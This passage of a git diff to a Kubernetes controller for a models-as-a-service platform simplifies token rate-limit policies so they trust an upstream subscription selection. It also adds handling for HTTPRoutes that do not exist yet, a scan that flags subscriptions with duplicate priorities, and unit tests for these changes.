+							"expression": `auth.metadata.apiKeyValidation.valid == true ? auth.metadata.apiKeyValidation.subscription : ""`,
 						},
 						"metrics":  false,
 						"priority": int64(0),
@@ -324,10 +415,17 @@ func (r *MaaSAuthPolicyReconciler) reconcileModelAuthPolicies(ctx context.Contex
 								"keyId": map[string]interface{}{
 									"selector": "auth.metadata.apiKeyValidation.keyId",
 								},
-								// Subscription metadata from /v1/subscriptions/select endpoint
+								// Subscription metadata from /internal/v1/subscriptions/select endpoint
 								"selected_subscription": map[string]interface{}{
 									"expression": `has(auth.metadata["subscription-info"].name) ? auth.metadata["subscription-info"].name : ""`,
 								},
+								// Model-scoped subscription key for TRLP isolation: namespace/name@modelNamespace/modelName
+								"selected_subscription_key": map[string]interface{}{
+									"expression": fmt.Sprintf(
+										`has(auth.metadata["subscription-info"].namespace) && has(auth.metadata["subscription-info"].name) ? auth.metadata["subscription-info"].namespace + "/" + auth.metadata["subscription-info"].name + "@%s/%s" : ""`,
+										ref.Namespace, ref.Name,
+									),
+								},
 								"organizationId": map[string]interface{}{
 									"expression": `has(auth.metadata["subscription-info"].organizationId) ? auth.metadata["subscription-info"].organizationId : ""`,
 								},
@@ -459,8 +557,6 @@ func (r *MaaSAuthPolicyReconciler) reconcileModelAuthPolicies(ctx context.Contex
 
 // deleteModelAuthPolicy deletes the aggregated AuthPolicy for a model in the given namespace.
 func (r *MaaSAuthPolicyReconciler) deleteModelAuthPolicy(ctx context.Context, log logr.Logger, modelNamespace, modelName string) error {
-	// Check if there are any remaining (non-deleted) MaaSAuthPolicies that reference this model.
-	// If yes, don't delete the aggregated AuthPolicy - they will rebuild it.
 	// Always delete the aggregated AuthPolicy so remaining MaaSAuthPolicies rebuild it
 	// without the subjects from the deleted policy. If we skip deletion, the aggregated
 	// AuthPolicy will contain stale subjects from the deleted MaaSAuthPolicy.
@@ -691,3 +787,24 @@ func (r *MaaSAuthPolicyReconciler) mapHTTPRouteToMaaSAuthPolicies(ctx context.Co
 	}
 	return requests
 }
+// deduplicateAndSort removes duplicates from a string slice and sorts it.
+// This ensures stable output across reconciles, preventing spurious updates
+// caused by non-deterministic Kubernetes List order.
+func deduplicateAndSort(items []string) []string {
+	if len(items) == 0 {
+		return items
+	}
+	// Use a map to deduplicate
+	seen := make(map[string]bool, len(items))
+	for _, item := range items {
+		seen[item] = true
+	}
+	// Build deduplicated slice
+	result := make([]string, 0, len(seen))
+	for item := range seen {
+		result = append(result, item)
+	}
+	// Sort for deterministic output
+	sort.Strings(result)
+	return result
+}
diff --git a/maas-controller/pkg/controller/maas/maasmodelref_controller.go b/maas-controller/pkg/controller/maas/maasmodelref_controller.go
index 5a4b97d1a..343a24143 100644
--- a/maas-controller/pkg/controller/maas/maasmodelref_controller.go
+++ b/maas-controller/pkg/controller/maas/maasmodelref_controller.go
@@ -82,6 +82,7 @@ func (r *MaaSModelRefReconciler) gatewayNamespace() string {
 //+kubebuilder:rbac:groups=gateway.networking.k8s.io,resources=gateways,verbs=get;list;watch
 //+kubebuilder:rbac:groups=kuadrant.io,resources=authpolicies,verbs=get;list;watch;create;update;patch;delete
 //+kubebuilder:rbac:groups=serving.kserve.io,resources=llminferenceservices,verbs=get;list;watch
+//+kubebuilder:rbac:groups="",resources=secrets,verbs=get
 
 const maasModelFinalizer = "maas.opendatahub.io/model-cleanup"
 
@@ -138,6 +139,13 @@ func (r *MaaSModelRefReconciler) Reconcile(ctx context.Context, req ctrl.Request
 			r.updateStatusWithReason(ctx, model, "Failed", fmt.Sprintf("kind not implemented: %s", kind), "Unsupported", statusSnapshot)
 			return ctrl.Result{}, nil
 		}
+		if errors.Is(err, ErrHTTPRouteNotFound) {
+			// HTTPRoute doesn't exist yet - this is normal during startup.
+			// Set status to Pending (not Failed). The HTTPRoute watch will trigger reconciliation when the route is created.
+			model.Status.Endpoint = ""
+			r.updateStatus(ctx, model, "Pending", "Waiting for HTTPRoute to be created", statusSnapshot)
+			return ctrl.Result{}, nil
+		}
 		log.Error(err, "failed to reconcile HTTPRoute")
 		r.updateStatus(ctx, model, "Failed", fmt.Sprintf("Failed to reconcile HTTPRoute: %v", err), statusSnapshot)
 		return ctrl.Result{}, err
diff --git a/maas-controller/pkg/controller/maas/maasmodelref_controller_test.go b/maas-controller/pkg/controller/maas/maasmodelref_controller_test.go
index 70f7260f0..863a128ff 100644
--- a/maas-controller/pkg/controller/maas/maasmodelref_controller_test.go
+++ b/maas-controller/pkg/controller/maas/maasmodelref_controller_test.go
@@ -510,6 +510,63 @@ func TestLlmisvcReadyChangedPredicate(t *testing.T) {
 	})
 }
 
+// TestMaaSModelRefReconciler_HTTPRouteRaceCondition verifies that MaaSModelRef reliably
+// reaches Ready state when HTTPRoute is created after the MaaSModelRef (common during startup).
+func TestMaaSModelRefReconciler_HTTPRouteRaceCondition(t *testing.T) {
+	ctx := context.Background()
+	const (
+		modelName   = "test-model"
+		llmisvcName = "test-llmisvc"
+		ns          = "default"
+	)
+
+	// Start with MaaSModelRef and ready LLMInferenceService, but NO HTTPRoute
+	llmisvc := newLLMISvc(llmisvcName, ns, corev1.ConditionTrue)
+	model := newMaaSModelRef(modelName, ns, "LLMInferenceService", llmisvcName)
+	r, c := newTestReconciler(model, llmisvc)
+	req := ctrl.Request{NamespacedName: types.NamespacedName{Name: modelName, Namespace: ns}}
+
+	// --- Phase 1: Reconcile without HTTPRoute -> should enter Pending ---
+
+	result, err := r.Reconcile(ctx, req)
+	if err != nil {
+		t.Fatalf("Reconcile (no HTTPRoute): %v", err)
+	}
+	if result.Requeue || result.RequeueAfter != 0 {
+		t.Errorf("expected no requeue when HTTPRoute not found (watch handles it), got: %v", result)
+	}
+
+	got := &maasv1alpha1.MaaSModelRef{}
+	if err := c.Get(ctx, req.NamespacedName, got); err != nil {
+		t.Fatalf("Get after first reconcile: %v", err)
+	}
+	if got.Status.Phase != "Pending" {
+		t.Errorf("Phase after first reconcile = %q, want Pending (HTTPRoute doesn't exist yet)", got.Status.Phase)
+	}
+	assertReadyCondition(t, got.Status.Conditions, metav1.ConditionFalse, "BackendNotReady")
+
+	// --- Phase 2: KServe creates HTTPRoute -> model should become Ready on re-reconcile ---
+
+	route := newLLMISvcRoute(llmisvcName, ns)
+	if err := c.Create(ctx, route); err != nil {
+		t.Fatalf("Create HTTPRoute: %v", err)
+	}
+
+	// Reconcile again (triggered by HTTPRoute watch)
+	if _, err := r.Reconcile(ctx, req); err != nil {
+		t.Fatalf("Reconcile (with HTTPRoute): %v", err)
+	}
+
+	final := &maasv1alpha1.MaaSModelRef{}
+	if err := c.Get(ctx, req.NamespacedName, final); err != nil {
+		t.Fatalf("Get after HTTPRoute created: %v", err)
+	}
+	if final.Status.Phase != "Ready" {
+		t.Errorf("Phase after HTTPRoute created = %q, want Ready", final.Status.Phase)
+	}
+	assertReadyCondition(t, final.Status.Conditions, metav1.ConditionTrue, "Reconciled")
+}
+
 // TestMaaSModelRefReconciler_DuplicateReconciliation verifies that reconciling the same
 // MaaSModelRef twice does not produce a redundant status update when nothing has changed.
 func TestMaaSModelRefReconciler_DuplicateReconciliation(t *testing.T) {
diff --git a/maas-controller/pkg/controller/maas/maassubscription_controller.go b/maas-controller/pkg/controller/maas/maassubscription_controller.go
index d92a64eb5..4f57bc871 100644
--- a/maas-controller/pkg/controller/maas/maassubscription_controller.go
+++ b/maas-controller/pkg/controller/maas/maassubscription_controller.go
@@ -33,10 +33,12 @@ import (
 	"k8s.io/apimachinery/pkg/runtime"
 	"k8s.io/apimachinery/pkg/runtime/schema"
 	"k8s.io/apimachinery/pkg/types"
+	"k8s.io/client-go/util/workqueue"
 	ctrl "sigs.k8s.io/controller-runtime"
 	"sigs.k8s.io/controller-runtime/pkg/builder"
 	"sigs.k8s.io/controller-runtime/pkg/client"
 	"sigs.k8s.io/controller-runtime/pkg/controller/controllerutil"
+	"sigs.k8s.io/controller-runtime/pkg/event"
 	"sigs.k8s.io/controller-runtime/pkg/handler"
 	"sigs.k8s.io/controller-runtime/pkg/predicate"
 	"sigs.k8s.io/controller-runtime/pkg/reconcile"
@@ -58,6 +60,10 @@ type MaaSSubscriptionReconciler struct {
 
 const maasSubscriptionFinalizer = "maas.opendatahub.io/subscription-cleanup"
 
+// ConditionSpecPriorityDuplicate is set True when another MaaSSubscription shares the same spec.priority
+// (API key mint and selector use deterministic tie-break; admins should set distinct priorities).
+const ConditionSpecPriorityDuplicate = "SpecPriorityDuplicate"
+
 // Reconcile is part of the main kubernetes reconciliation loop
 func (r *MaaSSubscriptionReconciler) Reconcile(ctx context.Context, req ctrl.Request) (ctrl.Result, error) {
 	log := logr.FromContextOrDiscard(ctx).WithValues("MaaSSubscription", req.NamespacedName)
@@ -112,6 +118,11 @@ func (r *MaaSSubscriptionReconciler) reconcileTokenRateLimitPolicies(ctx context
 				}
 				continue
 			}
+			if errors.Is(err, ErrHTTPRouteNotFound) {
+				// HTTPRoute doesn't exist yet - skip for now. HTTPRoute watch will trigger reconciliation when route is created.
+				log.Info("HTTPRoute not found for model, skipping TokenRateLimitPolicy creation", "model", modelRef.Namespace+"/"+modelRef.Name)
+				continue
+			}
 			return fmt.Errorf("failed to resolve HTTPRoute for model %s/%s: %w", modelRef.Namespace, modelRef.Name, err)
 		}
 
@@ -122,16 +133,12 @@ func (r *MaaSSubscriptionReconciler) reconcileTokenRateLimitPolicies(ctx context
 		}
 
 		limitsMap := map[string]interface{}{}
-		var allGroupNames, allUserNames []string
 		var subNames []string
 
 		type subInfo struct {
-			sub        maasv1alpha1.MaaSSubscription
-			mRef       maasv1alpha1.ModelSubscriptionRef
-			groupNames []string
-			userNames  []string
-			rates      []interface{}
-			maxLimit   int64
+			sub   maasv1alpha1.MaaSSubscription
+			mRef  maasv1alpha1.ModelSubscriptionRef
+			rates []interface{}
 		}
 		var subs []subInfo
 		for _, sub := range allSubs {
@@ -139,136 +146,54 @@ func (r *MaaSSubscriptionReconciler) reconcileTokenRateLimitPolicies(ctx context
 				if mRef.Namespace != modelRef.Namespace || mRef.Name != modelRef.Name {
 					continue
 				}
-				var groupNames []string
-				for _, group := range sub.Spec.Owner.Groups {
-					if err := validateCELValue(group.Name, "group name"); err != nil {
-						return fmt.Errorf("invalid owner in MaaSSubscription %s: %w", sub.Name, err)
-					}
-					groupNames = append(groupNames, group.Name)
-				}
-				var userNames []string
-				for _, user := range sub.Spec.Owner.Users {
-					if err := validateCELValue(user, "username"); err != nil {
-						return fmt.Errorf("invalid owner in MaaSSubscription %s: %w", sub.Name, err)
-					}
-					userNames = append(userNames, user)
-				}
 				var rates []interface{}
-				var maxLimit int64
 				if len(mRef.TokenRateLimits) > 0 {
 					for _, trl := range mRef.TokenRateLimits {
 						rates = append(rates, map[string]interface{}{"limit": trl.Limit, "window": trl.Window})
-						if trl.Limit > maxLimit {
-							maxLimit = trl.Limit
-						}
 					}
 				} else {
 					rates = append(rates, map[string]interface{}{"limit": int64(100), "window": "1m"})
-					maxLimit = 100
 				}
-				subs = append(subs, subInfo{sub: sub, mRef: mRef, groupNames: groupNames, userNames: userNames, rates: rates, maxLimit: maxLimit})
+				subs = append(subs, subInfo{sub: sub, mRef: mRef, rates: rates})
 				break
 			}
 		}
 
-		// Sort subscriptions by maxLimit descending (highest tier first).
-		sort.Slice(subs, func(i, j int) bool { return subs[i].maxLimit > subs[j].maxLimit })
-
-		// Helper: build a compact CEL predicate that checks if the user belongs to
-		// any of the given groups or matches any of the given usernames. Uses a single
-		// exists() call for groups (e.g. exists(g, g == "a" || g == "b")) instead of
-		// N separate exists() calls, keeping predicates short at scale.
-		buildMembershipCheck := func(groups, users []string) string {
-			var parts []string
-			if len(groups) > 0 {
-				var comparisons []string
-				for _, g := range groups {
-					comparisons = append(comparisons, fmt.Sprintf(`g == "%s"`, g))
-				}
-				parts = append(parts, fmt.Sprintf(`auth.identity.groups_str.split(",").exists(g, %s)`, strings.Join(comparisons, " || ")))
-			}
-			for _, u := range users {
-				parts = append(parts, fmt.Sprintf(`auth.identity.userid == "%s"`, u))
-			}
-			return strings.Join(parts, " || ")
-		}
-
-		headerCheck := `request.headers["x-maas-subscription"]`
-		headerExists := `request.headers.exists(h, h == "x-maas-subscription")`
-
-		for i, si := range subs {
+		// Trust auth.identity.selected_subscription_key from AuthPolicy.
+		// AuthPolicy has already validated subscription selection via /v1/subscriptions/select,
+		// which handles:
+		//  - Validating subscription exists and user has access (groups/users match)
+		//  - Auto-selecting if user has exactly one subscription
+		//  - Returning 403 Forbidden for invalid scenarios (wrong header, no access, multiple without header)
+		// TokenRateLimitPolicy simply applies the rate limit for the validated subscription.
+		//
+		// The selected_subscription_key format is: {subNamespace}/{subName}@{modelNamespace}/{modelName}
+		// This ensures proper isolation between subscriptions in different namespaces and across models.
+		for _, si := range subs {
 			subNames = append(subNames, si.sub.Name)
-			allGroupNames = append(allGroupNames, si.groupNames...)
-			allUserNames = append(allUserNames, si.userNames...)
 
-			membershipCheck := buildMembershipCheck(si.groupNames, si.userNames)
-			if membershipCheck == "" {
-				log.Info("skipping subscription with no owner groups/users — rate limit would be unreachable",
-					"subscription", si.sub.Name, "model", si.mRef.Name)
-				continue
-			}
-
-			// Collect higher-tier groups/users for exclusions
-			var excludeGroups, excludeUsers []string
-			for j := 0; j < i; j++ {
-				excludeGroups = append(excludeGroups, subs[j].groupNames...)
-				excludeUsers = append(excludeUsers, subs[j].userNames...)
-			}
-
-			// Build branch selection: explicit header OR auto-select with exclusions.
-			explicitBranch := fmt.Sprintf(`%s == "%s"`, headerCheck, si.sub.Name)
-			autoBranch := "!" + headerExists
-			if exclusionCheck := buildMembershipCheck(excludeGroups, excludeUsers); exclusionCheck != "" {
-				autoBranch += " && !(" + exclusionCheck + ")"
-			}
+			// Build subscription reference: namespace/name
+			subRef := fmt.Sprintf("%s/%s", si.sub.Namespace, si.sub.Name)
+			// Build model-scoped reference: subscription@model
+			modelScopedRef := fmt.Sprintf("%s@%s/%s", subRef, si.mRef.Namespace, si.mRef.Name)
 
-			limitsMap[fmt.Sprintf("%s-%s-tokens", si.sub.Name, si.mRef.Name)] = map[string]interface{}{
+			// TRLP limit key must be safe for YAML (no slashes)
+			safeKey := strings.ReplaceAll(subRef, "/", "-")
+			limitsMap[fmt.Sprintf("%s-%s-tokens", safeKey, si.mRef.Name)] = map[string]interface{}{
 				"rates": si.rates,
 				"when": []interface{}{
-					map[string]interface{}{"predicate": membershipCheck},
-					map[string]interface{}{"predicate": explicitBranch + " || (" + autoBranch + ")"},
+					map[string]interface{}{
+						"predicate": fmt.Sprintf(`auth.identity.selected_subscription_key == "%s"`, modelScopedRef),
+					},
 				},
 				"counters": []interface{}{
 					map[string]interface{}{"expression": "auth.identity.userid"},
 				},
 			}
-
-			// Deny users who explicitly select this subscription but don't belong to it.
-			limitsMap[fmt.Sprintf("deny-not-member-%s-%s", si.sub.Name, si.mRef.Name)] = map[string]interface{}{
-				"rates": []interface{}{map[string]interface{}{"limit": int64(0), "window": "1m"}},
-				"when": []interface{}{
-					map[string]interface{}{"predicate": explicitBranch},
-					map[string]interface{}{"predicate": "!(" + membershipCheck + ")"},
-				},
-				"counters": []interface{}{map[string]interface{}{"expression": "auth.identity.userid"}},
-			}
 		}
 
-		// Deny-unsubscribed: user is not in ANY subscription group/user list.
-		if denyCheck := buildMembershipCheck(allGroupNames, allUserNames); denyCheck != "" {
-			limitsMap[fmt.Sprintf("deny-unsubscribed-%s", modelRef.Name)] = map[string]interface{}{
-				"rates":    []interface{}{map[string]interface{}{"limit": int64(0), "window": "1m"}},
-				"when":     []interface{}{map[string]interface{}{"predicate": "!(" + denyCheck + ")"}},
-				"counters": []interface{}{map[string]interface{}{"expression": "auth.identity.userid"}},
-			}
-		}
-
-		// Deny invalid header: header present but doesn't match any known subscription.
-		if len(subNames) > 0 {
-			denyHeaderWhen := []interface{}{
-				map[string]interface{}{"predicate": headerExists},
-			}
-			for _, name := range subNames {
-				denyHeaderWhen = append(denyHeaderWhen,
-					map[string]interface{}{"predicate": fmt.Sprintf(`%s != "%s"`, headerCheck, name)},
-				)
-			}
-			limitsMap[fmt.Sprintf("deny-invalid-header-%s", modelRef.Name)] = map[string]interface{}{
-				"rates":    []interface{}{map[string]interface{}{"limit": int64(0), "window": "1m"}},
-				"when":     denyHeaderWhen,
-				"counters": []interface{}{map[string]interface{}{"expression": "auth.identity.userid"}},
-			}
-		}
+		// Sort subscription names for stable annotation value across reconciles
+		sort.Strings(subNames)
 
 		// Build the aggregated TokenRateLimitPolicy (one per model, covering all subscriptions)
 		policyName := fmt.Sprintf("maas-trlp-%s", modelRef.Name)
@@ -306,7 +231,7 @@ func (r *MaaSSubscriptionReconciler) reconcileTokenRateLimitPolicies(ctx context
 			if err := r.Create(ctx, policy); err != nil {
 				return fmt.Errorf("failed to create TokenRateLimitPolicy for model %s: %w", modelRef.Name, err)
 			}
-			log.Info("TokenRateLimitPolicy created", "name", policyName, "model", modelRef.Name, "subscriptions", subNames)
+			log.Info("TokenRateLimitPolicy created", "name", policyName, "model", modelRef.Name, "subscriptionCount", len(subNames), "subscriptions", subNames)
 		} else if err != nil {
 			return fmt.Errorf("failed to get existing TokenRateLimitPolicy: %w", err)
 		} else {
@@ -339,12 +264,12 @@ func (r *MaaSSubscriptionReconciler) reconcileTokenRateLimitPolicies(ctx context
 				}
 
 				if equality.Semantic.DeepEqual(snapshot.Object, existing.Object) {
-					log.Info("TokenRateLimitPolicy unchanged, skipping update", "name", policyName, "model", modelRef.Namespace+"/"+modelRef.Name)
+					log.Info("TokenRateLimitPolicy unchanged, skipping update", "name", policyName, "model", modelRef.Namespace+"/"+modelRef.Name, "subscriptionCount", len(subNames))
 				} else {
 					if err := r.Update(ctx, existing); err != nil {
 						return fmt.Errorf("failed to update TokenRateLimitPolicy for model %s/%s: %w", modelRef.Namespace, modelRef.Name, err)
 					}
-					log.Info("TokenRateLimitPolicy updated", "name", policyName, "model", modelRef.Namespace+"/"+modelRef.Name, "subscriptions", subNames)
+					log.Info("TokenRateLimitPolicy updated", "name", policyName, "model", modelRef.Namespace+"/"+modelRef.Name, "subscriptionCount", len(subNames), "subscriptions", subNames)
 				}
 			}
 		}
@@ -404,6 +329,15 @@ func (r *MaaSSubscriptionReconciler) handleDeletion(ctx context.Context, log log
 }
 
 func (r *MaaSSubscriptionReconciler) updateStatus(ctx context.Context, subscription *maasv1alpha1.MaaSSubscription, phase, message string, statusSnapshot *maasv1alpha1.MaaSSubscriptionStatus) {
+	// Status-only updates do not bump metadata.generation, so this reconcile may not re-queue.
+	// Merge SpecPriorityDuplicate from the API server so we do not clobber the async duplicate-priority scan.
+	latest := &maasv1alpha1.MaaSSubscription{}
+	if err := r.Get(ctx, client.ObjectKeyFromObject(subscription), latest); err == nil {
+		if dup := apimeta.FindStatusCondition(latest.Status.Conditions, ConditionSpecPriorityDuplicate); dup != nil {
+			apimeta.SetStatusCondition(&subscription.Status.Conditions, *dup)
+		}
+	}
+
 	subscription.Status.Phase = phase
 
 	status := metav1.ConditionTrue
@@ -431,6 +365,108 @@ func (r *MaaSSubscriptionReconciler) updateStatus(ctx context.Context, subscript
 	}
 }
 
+// scanForDuplicatePriority lists live MaaSSubscriptions and sets SpecPriorityDuplicate
+// on each. Triggered on create, delete, or when spec.priority changes (see SetupWithManager).
+func (r *MaaSSubscriptionReconciler) scanForDuplicatePriority(ctx context.Context) {
+	log := logr.FromContextOrDiscard(ctx).WithName("MaaSSubscriptionDuplicatePriority")
+	var list maasv1alpha1.MaaSSubscriptionList
+	if err := r.List(ctx, &list); err != nil {
+		log.Error(err, "failed to list MaaSSubscriptions for duplicate priority scan")
+		return
+	}
+
+	liveIdx := make([]int, 0, len(list.Items))
+	for i := range list.Items {
+		if list.Items[i].DeletionTimestamp.IsZero() {
+			liveIdx = append(liveIdx, i)
+		}
+	}
+
+	byPriority := make(map[int32][]string)
+	for _, i := range liveIdx {
+		s := &list.Items[i]
+		p := s.Spec.Priority
+		k := s.Namespace + "/" + s.Name
+		byPriority[p] = append(byPriority[p], k)
+	}
+	for p := range byPriority {
+		sort.Strings(byPriority[p])
+	}
+
+	var duplicateDetails []string
+	for p, keys := range byPriority {
+		if len(keys) > 1 {
+			duplicateDetails = append(duplicateDetails, fmt.Sprintf("priority=%d:%v", p, keys))
+		}
+	}
+	sort.Strings(duplicateDetails)
+	if len(duplicateDetails) > 0 {
+		log.Info("duplicate MaaSSubscription spec.priority groups — resolve ties for predictable API key mint / subscription selection",
+			"groups", duplicateDetails)
+	}
+
+	for _, i := range liveIdx {
+		s := &list.Items[i]
+		selfKey := s.Namespace + "/" + s.Name
+		p := s.Spec.Priority
+		keys := byPriority[p]
+		var peers []string
+		for _, k := range keys {
+			if k != selfKey {
+				peers = append(peers, k)
+			}
+		}
+
+		latest := &maasv1alpha1.MaaSSubscription{}
+		if err := r.Get(ctx, types.NamespacedName{Namespace: s.Namespace, Name: s.Name}, latest); err != nil {
+			log.Error(err, "failed to get MaaSSubscription for duplicate priority status patch", "subscription", selfKey)
+			continue
+		}
+		if !latest.DeletionTimestamp.IsZero() {
+			continue
+		}
+
+		gen := latest.GetGeneration()
+		var desired metav1.Condition
+		if len(peers) == 0 {
+			desired = metav1.Condition{
+				Type:               ConditionSpecPriorityDuplicate,
+				Status:             metav1.ConditionFalse,
+				Reason:             "NoDuplicatePeers",
+				Message:            "",
+				ObservedGeneration: gen,
+			}
+		} else {
+			desired = metav1.Condition{
+				Type:               ConditionSpecPriorityDuplicate,
+				Status:             metav1.ConditionTrue,
+				Reason:             "SharedPriority",
+				Message:            fmt.Sprintf("spec.priority %d is shared with: %s", p, strings.Join(peers, ", ")),
+				ObservedGeneration: gen,
+			}
+		}
+
+		cur := apimeta.FindStatusCondition(latest.Status.Conditions, ConditionSpecPriorityDuplicate)
+		if conditionsSemanticallyEqual(cur, &desired) {
+			continue
+		}
+		apimeta.SetStatusCondition(&latest.Status.Conditions, desired)
+		if err := r.Status().Update(ctx, latest); err != nil {
+			log.Error(err, "failed to update SpecPriorityDuplicate status", "subscription", selfKey)
+		}
+	}
+}
+
+func conditionsSemanticallyEqual(a, b *metav1.Condition) bool {
+	if a == nil && b == nil {
+		return true
+	}
+	if a == nil || b == nil {
+		return false
+	}
+	return a.Type == b.Type && a.Status == b.Status && a.Reason == b.Reason && a.Message == b.Message && a.ObservedGeneration == b.ObservedGeneration
+}
+
 // SetupWithManager sets up the controller with the Manager.
 func (r *MaaSSubscriptionReconciler) SetupWithManager(mgr ctrl.Manager) error {
 	// Watch generated TokenRateLimitPolicies so we re-reconcile when someone manually edits them.
@@ -442,6 +478,13 @@ func (r *MaaSSubscriptionReconciler) SetupWithManager(mgr ctrl.Manager) error {
 			predicate.GenerationChangedPredicate{},
 			predicate.Funcs{UpdateFunc: deletionTimestampSet},
 		))).
+		// Full scan of duplicate spec.priority on create, delete, or priority-only spec update.
+		// Does not enqueue reconciles; only patches status conditions on all subscriptions.
+		Watches(
+			&maasv1alpha1.MaaSSubscription{},
+			duplicatePriorityScanHandler(r),
+			builder.WithPredicates(duplicatePriorityScanPredicate()),
+		).
 		// Watch HTTPRoutes so we re-reconcile when KServe creates/updates a route
 		// (fixes race condition where MaaSSubscription is created before HTTPRoute exists).
 		Watches(&gatewayapiv1.HTTPRoute{}, handler.EnqueueRequestsFromMapFunc(
@@ -458,6 +501,37 @@ func (r *MaaSSubscriptionReconciler) SetupWithManager(mgr ctrl.Manager) error {
 		Complete(r)
 }
 
+// duplicatePriorityScanHandler runs a full duplicate-priority scan without enqueuing reconciles.
+func duplicatePriorityScanHandler(r *MaaSSubscriptionReconciler) handler.EventHandler {
+	return handler.Funcs{
+		CreateFunc: func(ctx context.Context, _ event.CreateEvent, _ workqueue.TypedRateLimitingInterface[reconcile.Request]) {
+			r.scanForDuplicatePriority(ctx)
+		},
+		UpdateFunc: func(ctx context.Context, _ event.UpdateEvent, _ workqueue.TypedRateLimitingInterface[reconcile.Request]) {
+			r.scanForDuplicatePriority(ctx)
+		},
+		DeleteFunc: func(ctx context.Context, _ event.DeleteEvent, _ workqueue.TypedRateLimitingInterface[reconcile.Request]) {
+			r.scanForDuplicatePriority(ctx)
+		},
+	}
+}
+
+// duplicatePriorityScanPredicate limits full scans to subscription lifecycle / priority changes.
+func duplicatePriorityScanPredicate() predicate.Predicate {
+	return predicate.Funcs{
+		CreateFunc: func(event.CreateEvent) bool { return true },
+		UpdateFunc: func(e event.UpdateEvent) bool {
+			oldSub, ok1 := e.ObjectOld.(*maasv1alpha1.MaaSSubscription)
+			newSub, ok2 := e.ObjectNew.(*maasv1alpha1.MaaSSubscription)
+			if !ok1 || !ok2 {
+				return false
+			}
+			return oldSub.Spec.Priority != newSub.Spec.Priority
+		},
+		DeleteFunc: func(event.DeleteEvent) bool { return true },
+	}
+}
+
 // mapGeneratedTRLPToParent maps a generated TokenRateLimitPolicy back to any
 // MaaSSubscription that references the same model. The TokenRateLimitPolicy is per-model (aggregated),
 // so we use the model label to find a subscription to trigger reconciliation.
diff --git a/maas-controller/pkg/controller/maas/maassubscription_controller_test.go b/maas-controller/pkg/controller/maas/maassubscription_controller_test.go
index 53ad59a72..8f7e83c16 100644
--- a/maas-controller/pkg/controller/maas/maassubscription_controller_test.go
+++ b/maas-controller/pkg/controller/maas/maassubscription_controller_test.go
@@ -18,10 +18,13 @@ package maas
 
 import (
 	"context"
+	"fmt"
+	"strings"
 	"testing"
 
 	maasv1alpha1 "github.com/opendatahub-io/models-as-a-service/maas-controller/api/maas/v1alpha1"
 	apierrors "k8s.io/apimachinery/pkg/api/errors"
+	apimeta "k8s.io/apimachinery/pkg/api/meta"
 	metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
 	"k8s.io/apimachinery/pkg/apis/meta/v1/unstructured"
 	"k8s.io/apimachinery/pkg/runtime/schema"
@@ -198,6 +201,74 @@ func TestMaaSSubscriptionReconciler_DuplicateReconciliation(t *testing.T) {
 	}
 }
 
+// TestMaaSSubscriptionReconciler_SpecPriorityDuplicateCondition checks scanForDuplicatePriority in one pass:
+// sub-a and sub-b share spec.priority; sub-c has a unique priority.
+func TestMaaSSubscriptionReconciler_SpecPriorityDuplicateCondition(t *testing.T) {
+	const (
+		modelName     = "llm"
+		namespace     = "default"
+		httpRouteName = "maas-model-" + modelName
+	)
+
+	model := newMaaSModelRef(modelName, namespace, "ExternalModel", modelName)
+	route := newHTTPRoute(httpRouteName, namespace)
+	subA := newMaaSSubscription("sub-a", namespace, "team-a", modelName, 100)
+	subA.Spec.Priority = 5
+	subB := newMaaSSubscription("sub-b", namespace, "team-b", modelName, 200)
+	subB.Spec.Priority = 5
+	subC := newMaaSSubscription("sub-c", namespace, "team-c", modelName, 300)
+	subC.Spec.Priority = 10
+
+	c := fake.NewClientBuilder().
+		WithScheme(scheme).
+		WithRESTMapper(testRESTMapper()).
+		WithObjects(model, route, subA, subB, subC).
+		WithStatusSubresource(&maasv1alpha1.MaaSSubscription{}).
+		Build()
+
+	r := &MaaSSubscriptionReconciler{Client: c, Scheme: scheme}
+	ctx := context.Background()
+
+	if _, err := r.Reconcile(ctx, ctrl.Request{NamespacedName: types.NamespacedName{Name: "sub-a", Namespace: namespace}}); err != nil {
+		t.Fatalf("Reconcile sub-a: %v", err)
+	}
+	r.scanForDuplicatePriority(ctx)
+
+	assertSpecPriorityDuplicate := func(t *testing.T, subName string, wantTrue bool, mustContainPeer string) {
+		t.Helper()
+		var got maasv1alpha1.MaaSSubscription
+		if err := c.Get(ctx, types.NamespacedName{Name: subName, Namespace: namespace}, &got); err != nil {
+			t.Fatalf("Get %s: %v", subName, err)
+		}
+		cond := apimeta.FindStatusCondition(got.Status.Conditions, ConditionSpecPriorityDuplicate)
+		if cond == nil {
+			t.Fatalf("expected SpecPriorityDuplicate condition on %s", subName)
+		}
+		if wantTrue {
+			if cond.Status != metav1.ConditionTrue {
+				t.Fatalf("%s: SpecPriorityDuplicate.Status = %s, want True", subName, cond.Status)
+			}
+			if mustContainPeer != "" && !strings.Contains(cond.Message, mustContainPeer) {
+				t.Fatalf("%s: message should mention peer %q, got %q", subName, mustContainPeer, cond.Message)
+			}
+		} else {
+			if cond.Status != metav1.ConditionFalse {
+				t.Fatalf("%s: SpecPriorityDuplicate.Status = %s, want False", subName, cond.Status)
+			}
+		}
+	}
+
+	t.Run("sub-a shares priority with sub-b", func(t *testing.T) {
+		assertSpecPriorityDuplicate(t, "sub-a", true, namespace+"/sub-b")
+	})
+	t.Run("sub-b shares priority with sub-a", func(t *testing.T) {
+		assertSpecPriorityDuplicate(t, "sub-b", true, namespace+"/sub-a")
+	})
+	t.Run("sub-c has unique priority", func(t *testing.T) {
+		assertSpecPriorityDuplicate(t, "sub-c", false, "")
+	})
+}
+
 // TestMaaSSubscriptionReconciler_DeleteAnnotation verifies that the Reconcile deletion
 // path respects the opt-out annotation: a TokenRateLimitPolicy with
 // opendatahub.io/managed=false must not be deleted when the parent MaaSSubscription is removed.
@@ -273,6 +344,7 @@ func TestMaaSSubscriptionReconciler_DeleteAnnotation(t *testing.T) {
 		})
 	}
 }
+
 // TestMaaSSubscriptionReconciler_MultipleSubscriptionsDeletion verifies that when multiple
 // MaaSSubscriptions reference the same model, deleting one does not delete the aggregated
 // TokenRateLimitPolicy, but deleting the last one does.
@@ -397,3 +469,230 @@ func TestMaaSSubscriptionReconciler_MultipleSubscriptionsDeletion(t *testing.T)
 		t.Errorf("TokenRateLimitPolicy should be deleted after deleting last parent subscription, but got error: %v", err)
 	}
 }
+
+// TestMaaSSubscriptionReconciler_SimplifiedTRLP verifies the TRLP no longer contains
+// membership checks, header validation, or deny rules. It should trust auth.identity.selected_subscription.
+func TestMaaSSubscriptionReconciler_SimplifiedTRLP(t *testing.T) {
